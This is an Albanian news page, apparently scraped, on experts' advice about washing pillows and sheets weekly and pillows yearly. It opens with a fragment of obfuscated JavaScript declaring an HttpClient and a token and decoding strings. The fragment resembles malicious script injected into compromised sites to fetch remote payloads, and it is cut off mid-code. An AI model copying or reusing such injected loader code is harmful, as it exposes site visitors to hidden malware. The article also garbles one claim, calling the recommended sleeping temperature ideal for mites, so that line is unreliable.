;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ekspertët tregojnë sa shpesh duhet t’i lani jastëkët dhe çarçafët tuaj

By

Ekspertët e gjumit kanë thënë se pastërtia e shtratit mund të ndikojë shumë në nivelin e rehatisë së gjumit.

Gjumi në një shtrat të pastër mund të ndihmojë në përmirësimin e higjienës si dhe mirëqenien e disponimin tuaj të përgjithshëm.

Mesatarisht, një i rritur heq 1.5 gram lëkurë të thatë çdo ditë dhe një sasi e madhe e saj gjendet brenda çarçafëve.

Atë pjesë të lëkurës e tërheqin marimangat dhe pluhuri, të cilat mund të çojnë në simptoma alergjie, astme, kollitje, teshtitje dhe kruarja të syve, raporton The Sun, transmeton Klankosova.tv.

Sipas ekspertëve rekomandohet të flini në temperaturë prej 60 deri në 70 gradë, që është temperatura ideale e marimangave dhe pluhurit, dhe për të parandaluar grumbullimin e lëkurës së vdekur, ekspertët thanë se është e rëndësishme që rregullisht të pastroni shtratin tuaj.

Ekspertët e mikrobiologjisë dhe dermatologjisë rekomanduan të lani çarçafët tuaj një herë në javë, ndërkaq një raport i Fondacionit Kombëtar të Gjumit zbuloi se 71 përqind e njerëzve kishin raportuar se kishin një gjumë më të mirë gjatë natës në çarçafë të pastër.

Për të hequr qafe lëkurën e vdekur dhe bakteret ekspertët rekomandojnë që t’i lani çarçafët në ujë të nxehtë dhe më pas t’i thani në ambient të hapur, ndëekaq larja e jastëkëve një herë në vit.

Artikuj të ngjashëm